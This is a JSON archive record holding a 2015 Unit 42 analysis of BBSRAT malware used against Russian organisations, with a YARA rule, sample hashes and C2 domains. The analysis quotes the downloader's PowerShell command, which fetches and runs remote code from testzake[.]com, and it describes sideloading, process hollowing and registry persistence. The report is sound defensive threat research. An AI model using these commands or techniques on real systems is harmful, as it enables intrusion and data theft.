{
	"id": "7ae1eae8-29f3-454b-a6b1-c08d9643964c",
	"created_at": "2026-04-06T00:13:27.383923Z",
	"updated_at": "2026-04-10T13:11:44.327881Z",
	"deleted_at": null,
	"sha1_hash": "db56e7016c89ff29a90db58668fa95512536daca",
	"title": "BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 886196,
	"plain_text": "BBSRAT Attacks Targeting Russian Organizations Linked to\r\nRoaming Tiger\r\nBy Bryan Lee, Josh Grunzweig\r\nPublished: 2015-12-22 · Archived: 2026-04-06 00:03:13 UTC\r\nIn late 2014, ESET presented an attack campaign that had been observed over a period of time targeting Russia\r\nand other Russian speaking nations, dubbed “Roaming Tiger”. The attack was found to heavily rely on RTF\r\nexploits and at the time, thought to make use of the PlugX malware family.\r\nESET did not attribute the attacks to a particular attack group, but noted that the objective of the campaign was\r\nespionage and general information stealing. Based on data collected from Palo Alto Networks AutoFocus threat\r\nintelligence, we discovered continued operations of activity very similar to the Roaming Tiger attack campaign\r\nthat began in the August 2015 timeframe, with a concentration of attacks in late October and continuing into\r\nDecember.\r\nThe adversaries behind these attacks continued to target Russia and other Russian speaking nations using similar\r\nexploits and attack vectors. However, while the malware used in these new attacks uses similar infection\r\nmechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We\r\nhave named this tool “BBSRAT.”\r\nTargeting and Infrastructure\r\nAs described in earlier reports on “Roaming Tiger”, the attack observed in August 2015 used weaponized exploit\r\ndocuments that leave Russian language decoy document files after infecting the system. 
The files exploit the well-known Microsoft Office vulnerability, CVE-2012-0158, to execute malicious code in order to take control of the\r\ntargeted systems.\r\nhttp://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/\r\nPage 1 of 18\n\nFigure 1 Spear-phishing email delivering BBSRAT\r\nIn one case, the adversary impersonated an individual from the organization Vigstar, a Russian-based research\r\norganization in charge of the development of satellite communications and special purpose wireless devices for\r\nthe Russian Federation’s defense and security agencies. The targeted email address appeared to be a Gmail\r\naccount associated with Vigstar as well, and was found on a job board website for a job opening at Vigstar.\r\nThe rough translation of the body of the email is as follows:\r\nI send you a \"list of international exhibitions of military, civil and dual-purpose, conducted in 2015 on the\r\nterritory of the Russian Federation and foreign states.\" Waiting for your reply!\r\nFigure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of\r\ninternational exhibitions that were conducted on Russian territory in 2015.\r\nFigure 2 Decoy document that is opened after the malicious document has infected the system\r\nIn more recent months, we have identified several other potential Russian victims using AutoFocus. Analysis of\r\nthe command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same\r\nC2 domains as previously published in the “Roaming Tiger” campaign, including transactiona[.]com and\r\nfuturesgold[.]com. 
Interestingly, all of the previously published C2 domains have significant overlap amongst the\r\nhashes and IPs while C2s for BBSRAT contain no overlap at all. This may indicate that for the newer attack\r\ncampaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each\r\nof the intended targets.\r\nFigure 3 Command and control infrastructure\r\nBBSRAT Malware Analysis\r\nDeployment Technique #1\r\nBBSRAT is typically packaged within a portable executable file, although in a few of the observed instances, a\r\nraw DLL was discovered to contain BBSRAT. When the dropper first runs, it will generate a path in the\r\n%TEMP% directory. The generated filename is 10-16 uppercase alphabetic characters, and ends with a ‘.TMP’\r\nfile extension. The dropper will continue to write an embedded CAB file in this location.\r\nFigure 4 Header of CAB file dropped by BBSRAT\r\nThe malware will proceed to create one of the following directories depending on what version of Microsoft\r\nWindows is running on the target machine:\r\n%ALLUSERSPROFILE%\\SSONSVR\r\n%ALLUSERSPROFILE%\\Application Data\\SSONSVR\r\nUsing the built-in expand.exe utility provided by Microsoft Windows, the dropper executes the following\r\ncommand, which will expand the CAB file and write the results to the provided directory:\r\nexpand.exe \"%TEMP%\\[temp_file]\" Destination \"[chosen_path]\\SSONSVR\"\r\nThis results in the following three files being written to the SSONSVR directory:\r\naclmain.sdb\r\npnipcn.dll\r\nssonsvr.exe\r\nThe 'ssonsvr.exe' file is a legitimate Citrix executable that will be used to sideload the malicious ‘pnipcn.dll’ file.\r\nThe ‘aclmain.sdb’ file contains
code that will eventually be loaded by the ‘pnipcn.dll’ file.\r\nThe malware finally executes ‘ssonsvr.exe’ via a call to ShellExecuteW.\r\nFigure 5 Execution flow of dropper expanding CAB file\r\nWhen ‘ssonsvr.exe’ is executed, and the pnipcn.dll file is loaded, it will begin by identifying the path to\r\nmsiexec.exe, by expanding the following environment string:\r\n%SystemRoot%\\System32\\msiexec.exe\r\nIt will then spawn a suspended instance of msiexec.exe in a new process. The malware proceeds to load code from\r\nthe ‘aclmain.sdb’ file and performs process hollowing against this instance of msiexec.exe prior to resuming the\r\nprocess.\r\nFigure 6 Sideloading execution flow\r\nIn order to ensure persistence, the following registry key is written on the victim’s machine:\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe : [path_to_ssonsvr.exe]\r\nDeployment Technique #2\r\nIn the most recently observed sample of BBSRAT found in AutoFocus, the Trojan was deployed via a downloader\r\nthat used the Invoke-ReflectivePEInjection.ps1 script from the PowerSploit framework.\r\nWhen the downloader executes, it will first decrypt the following two strings using a 5-byte XOR key of\r\n“\\x01\\x02\\x03\\x04\\x05”:\r\n\"powershell -exec bypass -c IEX (New-Object\r\nNet.WebClient).DownloadString('http://testzake[.]com/IR.ps1');Invoke-ReflectivePEInjection -PEUrl\r\nhttp://testzake[.]com/s.exe\"\r\n\"C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell -exec bypass -c IEX (New-Object\r\nNet.WebClient).DownloadString('http://testzake[.]com/IR.ps1');Invoke-ReflectivePEInjection -PEUrl\r\nhttp://testzake[.]com/s.exe\"\r\nThese strings are then sequentially executed via calls to WinExec. As we can see, the second command is\r\nspecifically crafted to run on 64-bit versions of Microsoft Windows. 
The commands in question will download an\r\nexecutable file and run it within the context of the PowerShell process.\r\nWhen the above commands are executed, the downloader will initially download the ‘IR.ps1’ PowerShell script\r\nfrom the specified URL:\r\nFigure 7 Downloader downloading the Invoke-ReflectivePEInjection PowerSploit script\r\nThis PowerShell script appears to have been pulled directly from the PowerSploit framework, with no\r\nmodifications made. The malware then invokes this script with a URL that points to an additional executable file.\r\nThis downloaded executable contains a copy of the BBSRAT malware family.\r\nThe downloader proceeds to drop either a 32-bit or 64-bit DLL file that will execute the two previously stated\r\nPowerShell commands when the DLL is loaded. This DLL is dropped to one of the following locations:\r\n%SYSTEMROOT%\\web\\srvcl32.dll\r\n%APPDATA%\\web\\srvcl32.dll\r\nAdditionally, the following registry keys are set depending on the system’s CPU architecture:\r\nHKU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\\ThreadingModel - \"Both\"\r\nHKU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\\Default - [path_to_srvcl32.dll]\r\nHKLM\\SOFTWARE\\Classes\\CLSID\\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\\InprocServer32\\ThreadingModel - \"Both\"\r\nHKLM\\SOFTWARE\\Classes\\CLSID\\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\\InprocServer32\\Default - [path_to_srvcl32.dll]\r\nThe COM object for {42aedc87-2188-41fd-b9a3-0c966feabec1} is specific to ‘MruPidlList’, while the COM\r\nobject for {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} is specific to ‘Microsoft WBEM New Event\r\nSubsystem’. This ensures that the DLL specified will load when Microsoft Windows starts. 
It is a technique that\r\nwas used by the ZeroAccess rootkit when it initially surfaced.\r\nBBSRAT Execution\r\nAfter being loaded using one of the two techniques discussed, BBSRAT malware begins execution by loading the\r\nfollowing libraries at runtime:\r\nntdll.dll\r\nkernel32.dll\r\nuser32.dll\r\nadvapi32.dll\r\ngdi32.dll\r\nws2_32.dll\r\nshell32.dll\r\npsapi.dll\r\nSecur32.dll\r\nWtsApi32.dll\r\nNetapi32.dll\r\nVersion.dll\r\nCrypt32.dll\r\nWininet.dll\r\nThe following mutex is then created to ensure a single instance of BBSRAT is running at a given time:\r\nGlobal\\GlobalAcProtectMutex\r\nThroughout the execution of BBSRAT, it will dynamically load functions prior to calling them, as seen in the\r\nexample below demonstrating BBSRAT making a call to the WSAStartup function:\r\nFigure 8 BBSRAT calling WSAStartup function\r\nThe malware proceeds to parse the stored embedded network configuration and spawns a series of threads\r\nresponsible for network communication. This includes a series of HTTP or HTTPS requests, such as the\r\nfollowing:\r\nGET /bbs/1/forum.php?sid=1 HTTP/1.1\r\nCookie: A46A8AA9-D7D6-43FB-959DC96E\r\nContent-Length:\r\nUser-Agent: Mozilla/4.0 (compatible; Windows NT 5.1)\r\nConnection: Keep-Alive\r\nHost: transactiona[.]com\r\nCache-Control: no-cache\r\nAccept: */*\r\nContent-Type:\r\nIn the above example, the ‘1’ used both in the URI and the sid GET parameter is a global incremental counter.\r\nEvery subsequent request made by BBSRAT increments this counter by one. Additionally, all variants of BBSRAT\r\nwe have found use the same URL for command and control (C2) communication.\r\nWhen first executed, the malware will exfiltrate data about the victim’s machine via a POST request to the\r\n‘/bbs/[counter]/forum.php?sid=[counter]’ URL. 
All network data sent via POST requests uses a custom binary\r\nstructure, defined as follows:\r\nstruct network_header\r\n{\r\n    DWORD random;\r\n    DWORD hardcoded0;\r\n    DWORD hardcoded1;\r\n    DWORD command;\r\n    DWORD length_of_compressed_data;\r\n    DWORD length_of_decompressed_data;\r\n    DWORD unknown2;\r\n    BYTE compressed_data[];\r\n};\r\nThe compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the\r\nevent data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to\r\nthe POST data:\r\ndef decrypt(data):\r\n    # data is the raw POST body as a byte string; every byte is transformed\r\n    # independently: subtract 23, XOR with 62, add 23, keep the low byte.\r\n    out = bytearray()\r\n    for x in bytearray(data):\r\n        t = x - 23\r\n        t1 = t ^ 62\r\n        t2 = (t1 + 23) \u0026 0xFF\r\n        out.append(t2)\r\n    return bytes(out)\r\nThe following data structure holds the victim’s information that is uploaded by BBSRAT:\r\nstruct victim_information\r\n{\r\n    DWORD static_value;\r\n    DWORD major_version;\r\n    DWORD minor_version;\r\n    DWORD build_number;\r\n    DWORD platform_id;\r\n    DWORD default_locale;\r\n    DWORD unknown;\r\n    DWORD local_ip_address;\r\n    DWORD running_as_64_bit;\r\n    DWORD random;\r\n    DWORD unknown2;\r\n    DWORD struct_length;\r\n    DWORD struct_with_not_used_length;\r\n    DWORD struct_with_username_length;\r\n    DWORD struct_with_group_length;\r\n    DWORD unknown3;\r\n    DWORD struct_with_hostname_length;\r\n    WCHAR not_used[??];\r\n    WCHAR username[??];\r\n    WCHAR group[??];\r\n    WCHAR hostname[??];\r\n};\r\nBBSRAT accepts many possible commands that the C2 server can provide. 
These commands are sent as a\r\nresponse to the GET beacons that are continually requested via either HTTP or HTTPS. The following commands\r\nand sub-commands have been identified:\r\nCommand Sub-command Description\r\n0x110010 N/A Beacon\r\n0x110011 N/A Uninstall/Kill Malware\r\n0x110020 N/A Upload Victim Information\r\n0x110064 0x2 Execute Command and Return Response\r\n0x110064 0x4 Unknown\r\n0x110064 0x5 Execute Shellcode\r\n0x110066 0x7 Query Service Configuration\r\n0x110066 0x9 Start Service\r\n0x110066 0xa Stop Service\r\n0x110066 0xb Delete Service\r\n0x110066 0xc Change Service Configuration\r\n0x110063 0xd Enumerate Running Processes\r\n0x110063 0xf Kill Process\r\n0x110063 0x10 Get Process Information\r\n0x110063 0x12 Free Library for Specified Process\r\n0x110065 0x1b Execute Command Quietly\r\n0x110065 0x1e Send Input to Console\r\n0x110065 0x1f Execute Shellcode\r\n0x110061 0x20 List Drive Information\r\n0x110061 0x21 List File Information For Given Directory\r\n0x110061 0x23 Write File\r\n0x110061 0x24 Read File\r\n0x110061 0x25 List File Information For Given Directory\r\n0x110061 0x27 Perform File Operation via SHFileOperation()\r\n0x110061 0x28 Delete File\r\n0x110061 0x29 Create Directory\r\n0x110061 0x2a Shell Execute\r\nPlease refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers.\r\nConclusion\r\nAs in many of the previous articles regarding espionage-motivated adversaries and possible nation-state\r\ncampaigns, what is being observed in this attack campaign is a continued operation and evolution by the adversary\r\neven after its tactics, techniques, and procedures (TTPs) have become public knowledge. 
Despite the fact that the\r\ninformation about these attackers has been public for over a year, including a listing of many of the command and\r\ncontrol servers, they continue to reuse much of their exposed playbook. We urge organizations to use the data\r\nfrom Unit 42 and other threat intelligence sources to proactively secure themselves and prevent\r\nattacks.\r\nWildFire properly classifies BBSRAT malware samples as malicious. We have released DNS signatures to block\r\naccess to the C2 domain names included in this report. AutoFocus users can explore these attacks using the\r\nBBSRAT malware family tag.\r\nAppendix\r\nYARA Rule\r\nrule bbsrat {\r\n    meta:\r\n        author = \"Tyler Halfpop\"\r\n        company = \"Palo Alto Networks\"\r\n        last_updated = \"12-16-15\"\r\n    strings:\r\n        $sa0 = \"%ALLUSERSPROFILE%\\\\SSONSVR\" fullword wide\r\n        $sa1 = \"%ALLUSERSPROFILE%\\\\Application Data\\\\SSONSVR\" fullword wide\r\n        $sa2 = \"\\\\ssonsvr.exe\" fullword wide\r\n        $oa0 = { 83 E8 01 88 0C 04 75 F8 8B 44 24 40 89 4C 24 18 89 4C 24 1C 89 4C 24 30 89 4C 24 34 89 4C 24 20 89 4C 24 38 8D 0C 24 51 C7 44 24 04 3C 00 00 00 C7 44 24 08 40 00 00 00 C7 44 24 10 70 20 40 00 C7 44 24 14 A0 20 40 00 89 44 24 18 FF 15 54 20 40 00 85 C0 75 04 83 C4 3C C3 }\r\n        $oa1 = { 75 11 5F 5E B8 0D 00 00 00 5B 81 C4 ?? 07 00 00 C2 10 00 53 68 80 00 00 00 6A 02 53 6A 02 6A 02 8D 54 24 ?? 52 89 5C 24 30 FF 15 38 20 40 00 }\r\n        $sb0 = \"%systemroot%\\\\Web\\\\\"\r\n        $sb1 = \"srvcl32.dll\"\r\n        $ob0 = { B8 67 66 66 66 F7 E9 D1 FA 8B C2 C1 E8 1F 03 C2 8D 04 80 8B D1 2B D0 8A 44 94 04 30 81 08 58 40 00 41 3B CE 7C DA B8 08 58 40 00 5E 83 C4 14 C3 }\r\n        $ob1 = { 8D 84 24 18 02 00 00 50 C7 84 24 1C 02 00 00 94 00 00 00 FF 15 4C 20 40 00 8B 8C 24 20 02 00 00 0F B7 94 24 1C 02 00 00 C1 E9 10 0B CA 83 F9 06 0F 85 7F 00 00 00 }\r\n    condition:\r\n        uint16(0) == 0x5a4d and filesize \u003c 300KB and (all of ($sa*) or all of ($oa*) or all of ($sb*) or all of ($ob*))\r\n}\r\nBBSRAT Samples\r\nMD5 EF5FA2378307338D4E75DECE88158D77 (Sample Analyzed)\r\nSHA1 574230D89EABDE0B6F937CD718B3AD19BB4F5CE3\r\nSHA256 FC4B465EE8D2053E9E41FB0A6AE32843E4E23145845967A069E584F582279725\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\ntransactiona[.]com\r\nfinancenewsru[.]net\r\nMD5 2254A1CA05DB87D9D58A71DDB97C7395\r\nSHA1 65B17D3FF68D25392A9B0B9E25A275540DFB4E8D\r\nSHA256 567A5B54D6C153CDD2DDD2B084F1F66FC87587DD691CD2BA8E30D689328A673F\r\nCompile Time 2015-11-04 07:14:33 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\njowwln[.]cocolco[.]com\r\npagbine[.]ofhloe[.]com\r\ncdaklle[.]housejjk[.]com\r\nMD5 74A41C62D9EC1164AF82B802DA3E8B3E\r\nSHA1 D390E0965823E42584F2799EF0E8161A6540AF3E\r\nSHA256 77A2E26097285A794E42C9E813D14936D0E7A1DD3504205DD6B28A71626F8C3C\r\nCompile Time 2015-11-04 07:14:33\r\nNetwork Protocol HTTPS\r\nC2 Server(s) kop[.]gupdiic[.]com\r\nMD5 C17534E4B61C08A7646CDC64574B429B\r\nSHA1 931BAB999568C228616430A5AEDFEDFC34E1F151\r\nSHA256 61A692E615E31B97B47A215479E6347FBD8E6E33D7C9D044766B4C1D1AE1B1FB\r\nCompile Time 2015-11-04 07:14:33 
UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s) herman[.]eergh[.]com\r\nMD5 C7C79393E762E7ED925F42D3C899BA60\r\nSHA1 7406B11851200D0ADA1A8334107182D636738CE5\r\nSHA256 B1737F3A1C50CB39CD9938D5EC3B4A6A10B711F17E917886481C38967B93E259\r\nCompile Time N/A\r\nNetwork Protocol HTTP\r\nC2 Server(s) 211.44.42[.]55\r\nMD5 0EA888E970345B2FBFD74B369FE46DDD\r\nSHA1 EB4F9BDE2FFAE863E0D7AD5848A758D59224C3F7\r\nSHA256 56D878EDD61176CA30D4A41555671161158E94E8A50E5482985F42C4E4843CB5\r\nCompile Time 2015-08-25 09:33:57 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\ncrew[.]wichedgecrew[.]com\r\nblueway[.]garmio-drive[.]com\r\nhelloway[.]floretdog[.]com\r\nMD5 FA944818A939456A7B6170326C49569F\r\nSHA1 0EB3AE28A7A7D97ABA30DA4E8EB0A4AB36EFD035\r\nSHA256 22592A32B1193587A707D8B20C04D966FE61B37F7DEF7613D9BB91FF2FE9B13B\r\nCompile Time 2015-08-25 09:33:57 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\npanaba[.]empleoy-plan[.]com\r\nkop[.]gupdiic[.]com\r\npeak[.]measurepeak[.]com\r\nMD5 896691AE546F498404F5884607D6EB50\r\nSHA1 91A176EB5B2436762B9898075EC66042E33615A3\r\nSHA256 13D0BD83A023712B54C1DD391DFC1BC27B22D9DF4FE3942E2967EC82D7C95640\r\nCompile Time N/A\r\nNetwork Protocol HTTP\r\nC2 Server(s) 211.44.42[.]55\r\nMD5 A78B9438117963A9A18B2F056888498B\r\nSHA1 98E79C065DB88B4686AB5B7C36C4524333D64C48\r\nSHA256 E049BD90028A56B286F4B0B9062A8DF2AB2DDF492764E3962F295E9CE33660E3\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTP\r\nC2 Server(s)\r\n211.44.42[.]55\r\nsupport.yandexmailru[.]kr\r\nMD5 B4927EAC9715014E17C53841FEEDF4E1\r\nSHA1 26E8CFD13175B67C12FC72A11FBDBC749F0B61C0\r\nSHA256 2D81D65D09BF1B864D8964627E13515CEE7DEDDFBD0DC70B1E67F123AB91421E\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\nkop[.]gupdiic[.]com\r\npanaba[.]empleoy-plan[.]com\r\npeak[.]measurepeak[.]com\r\nMD5 41A02CAF0A0D32FAD5418425F9973616\r\nSHA1 CC83EA6EF4763F24193D56359590BB34127DD36E\r\nSHA256 7438ED5F0FBE4B26AFED2FE0E4E4531FC129A44D8EA416F12A77D0C0CD873520\r\nCompile Time 2015-08-25 09:33:57 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\nherman[.]eergh[.]com\r\nprdaio[.]unbrtel[.]com\r\nloomon[.]gupdicc[.]com\r\nMD5 AA59EE1E40D22BD22CEE19B8B6A17DF3\r\nSHA1 963E0AD3EC717253A8E74F45D3C552107D6ECACA\r\nSHA256 6FAE5305907CE99F9AB51E720232EF5ACF1950826DB520A847BF8892DC9578DE\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s) winwordupdate[.]dynu[.]com\r\nMD5 B934BF027EC3A9DFCAE9D836D68BAB75\r\nSHA1 E9744516E621B233C44F5854C0DF63FFDD62FB81\r\nSHA256 0BAF36CA2D3772FDFF989E2B7E762829D30DB132757340725BB50DEE3B51850C\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\ntransactiona[.]com\r\nfinancenewsru[.]net\r\nMD5 7533E65A16B4B3BA451A141F389D3A30\r\nSHA1 CB46E6234DA0A9C859C1F71FFEB86100284A0142\r\nSHA256 D579255852720D794349AE2238F084C6393419AF38479F3D0E3D2A21C9EB8E18\r\nCompile Time 2014-12-26 17:17:00 UTC\r\nNetwork Protocol HTTPS\r\nC2 Server(s)\r\nwinwordupdate[.]dynu[.]com\r\nadobeflashupdate1[.]strangled[.]net\r\nMD5 8CD233D3F226CB1BF6BF15ACA52E0E36\r\nSHA1 B955CA4AA8F7181C2252C4699718F6FEFC0B9CE3\r\nSHA256 95F198ED29CF3F7D4DDD7CF688BFEC9E39D92B78C0A1FD2288E13A92459BDB35\r\nCompile Time 2015-09-22 06:16:44 UTC\r\nNetwork Protocol HTTP\r\nC2 Server(s) www[.]testzake[.]com\r\nPowerSploit Downloader\r\nMD5 0AA391DC6D9EBEC2F5D0EE6B4A4BA1FA\r\nSHA1 D238C157F87204D03C9005AF9A9CBC28C108E50A\r\nSHA256 
71DC584564B726ED2E6B1423785037BFB178184419F3C878E02C7DA8BA87C64D\r\nCompile Time 2015-09-21 11:59:18 UTC\r\nNetwork Protocol HTTP\r\nC2 Server(s) www[.]testzake[.]com\r\nSource: http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/"
	],
	"report_names": [
		"bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger"
	],
	"threat_actors": [
		{
			"id": "866c0c21-8de3-4ad5-9887-cecd44feb788",
			"created_at": "2022-10-25T16:07:24.130298Z",
			"updated_at": "2026-04-10T02:00:04.875929Z",
			"deleted_at": null,
			"main_name": "Roaming Tiger",
			"aliases": [
				"Bronze Woodland",
				"CTG-7273",
				"Rotten Tomato"
			],
			"source_name": "ETDA:Roaming Tiger",
			"tools": [
				"Agent.dhwf",
				"AngryRebel",
				"BBSRAT",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Kaba",
				"Korplug",
				"Moudour",
				"Mydoor",
				"PCRat",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Xamtrav"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5afe7b81-e99a-4c24-8fcc-250fb0cf40a3",
			"created_at": "2023-01-06T13:46:38.324616Z",
			"updated_at": "2026-04-10T02:00:02.928697Z",
			"deleted_at": null,
			"main_name": "Roaming Tiger",
			"aliases": [
				"BRONZE WOODLAND",
				"Rotten Tomato"
			],
			"source_name": "MISPGALAXY:Roaming Tiger",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee9a20b1-c6d6-42da-909d-66e7699723d1",
			"created_at": "2025-08-07T02:03:24.704306Z",
			"updated_at": "2026-04-10T02:00:03.722506Z",
			"deleted_at": null,
			"main_name": "BRONZE WOODLAND",
			"aliases": [
				"CTG-7273 ",
				"Roaming Tiger ",
				"Rotten Tomato "
			],
			"source_name": "Secureworks:BRONZE WOODLAND",
			"tools": [
				"Appat",
				"BbsRAT",
				"PlugX",
				"Zbot"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434407,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/db56e7016c89ff29a90db58668fa95512536daca.pdf",
		"text": "https://archive.orkl.eu/db56e7016c89ff29a90db58668fa95512536daca.txt",
		"img": "https://archive.orkl.eu/db56e7016c89ff29a90db58668fa95512536daca.jpg"
	}
}